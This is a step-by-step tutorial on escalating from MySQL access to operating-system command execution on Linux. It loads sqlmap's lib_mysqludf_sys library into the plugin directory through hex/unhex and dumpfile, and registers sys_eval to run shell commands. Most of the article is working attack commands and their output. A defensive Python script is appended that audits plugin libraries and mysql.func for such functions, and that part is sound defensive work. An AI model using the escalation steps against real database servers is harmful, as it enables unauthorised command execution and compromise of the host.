Using the UDF library on Linux for MySQL privilege escalation

  • 2020-06-23 02:05:03
  • OfStack

Environment:
OS: Linux (BT5)

Database: MySQL

Description:
User-defined functions (UDFs) loaded from a custom library are used to execute arbitrary programs. This was tested only on Linux; on Windows a DLL is used, so the library file is naturally different.

Requirements:
The func table must exist in the mysql database, and if --skip-grant-tables is enabled, UDFs are disabled.

Procedure: get the path of the plug-in library, find the UDF library file for the corresponding operating system, then use the UDF library file to load a function and execute commands.

1. Get the plug-in library path


mysql> show variables like "%plugin%";
+---------------+-----------------------+
| Variable_name | Value                 |
+---------------+-----------------------+
| plugin_dir    | /usr/lib/mysql/plugin |
+---------------+-----------------------+
1 row in set (0.00 sec)

2. Find the UDF library file of the corresponding operating system
Since this was my own test, I checked the version of my own system: 64-bit.


root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux


The UDF library files can be found in the sqlmap tool; just look for the one that matches the operating system version.


root@bt:/pentest/database/sqlmap/udf/mysql# ls
linux windows
root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
32 64
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so

3. Use the udf library file to load functions and execute commands
The first step is to get the hexadecimal form of the UDF library file, which can be done locally:


mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';
Query OK, 1 row affected (0.04 sec)


Since I used my own account, mysql, instead of root during the test, the plug-in directory could not be written. In reality, however, with UDF the mysql program is generally started with root permissions, so insufficient permissions on the directory are not a problem. To continue, modify the directory permissions:

root@bt:~# chmod 777 /usr/lib/mysql/plugin

From the database, write the UDF library into the MySQL plug-in directory:


mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.04 sec)


Take a look at the functions exported by the UDF library:


root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
         w _Jv_RegisterClasses
0000000000201788 A __bss_start
         w __cxa_finalize
         w __gmon_start__
0000000000201788 A _edata
0000000000201798 A _end
0000000000001178 T _fini
0000000000000ba0 T _init
         U fgets
         U fork
         U free
         U getenv
000000000000101a T lib_mysqludf_sys_info
0000000000000da4 T lib_mysqludf_sys_info_deinit
0000000000001047 T lib_mysqludf_sys_info_init
         U malloc
         U mmap
         U pclose
         U popen
         U realloc
         U setenv
         U strcpy
         U strncpy
0000000000000dac T sys_bineval
0000000000000dab T sys_bineval_deinit
0000000000000da8 T sys_bineval_init
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
00000000000010f7 T sys_get
0000000000000da5 T sys_get_deinit
0000000000000fea T sys_get_init
000000000000107a T sys_set
00000000000010e8 T sys_set_deinit
0000000000000f80 T sys_set_init
         U sysconf
         U system
         U waitpid

Finally, the function is loaded and executed:


mysql> create function sys_eval returns string soname "mysqludf.so";
Query OK, 0 rows affected (0.14 sec)
 
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql              |
+--------------------+
1 row in set (0.04 sec)
 
mysql> select * from mysql.func;
+----------+-----+-------------+----------+
| name     | ret | dl          | type     |
+----------+-----+-------------+----------+
| sys_eval |   0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set
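
The two artifacts shown above, the `nm -D` listing and the rows in mysql.func, are also what a defender can audit. The following Python is an added example, not part of the original article or of sqlmap: it parses `nm -D` output for a file in plugin_dir, finds UDF entry points, and flags libraries that also import process-spawning calls. The names parse_nm and audit_library are hypothetical, and the sample listing is a constructed subset of the output above.

```python
import re

# Imports that let a shared object spawn processes; system, popen and fork appear in the listing above.
EXEC_IMPORTS = {"system", "popen", "fork", "execve", "execvp"}

# Constructed sample: a subset of the `nm -D` output shown in the article.
SAMPLE_NM = """\
         U fork
         U popen
         U system
0000000000201788 A __bss_start
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
"""

def parse_nm(text):
    """Split `nm -D` output into (exported code symbols, undefined imports)."""
    exported, imported = set(), set()
    for line in text.splitlines():
        m = re.match(r"^\s*(?:[0-9a-fA-F]+\s+)?([A-Za-z])\s+(\S+)$", line)
        if not m:
            continue
        kind, name = m.groups()
        if kind == "T":
            exported.add(name)
        elif kind == "U":
            imported.add(name)
    return exported, imported

def audit_library(nm_text, registered=()):
    """Flag a plug-in library that exposes UDFs and can run OS commands.
    `registered` holds the `name` values read from mysql.func."""
    exported, imported = parse_nm(nm_text)
    # By default MySQL loads xxx() only if an auxiliary symbol such as
    # xxx_init() or xxx_deinit() is exported by the same library.
    udfs = sorted(s for s in exported
                  if s + "_init" in exported or s + "_deinit" in exported)
    risky = sorted(imported & EXEC_IMPORTS)
    return {"udfs": udfs, "exec_imports": risky,
            "active": sorted(set(registered) & set(udfs)),
            "suspicious": bool(udfs and risky)}

if __name__ == "__main__":
    print(audit_library(SAMPLE_NM, registered=["sys_eval"]))
```

The "active" field lists functions that are both exported by the library and registered in mysql.func, which are the ones callable from SQL right now.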

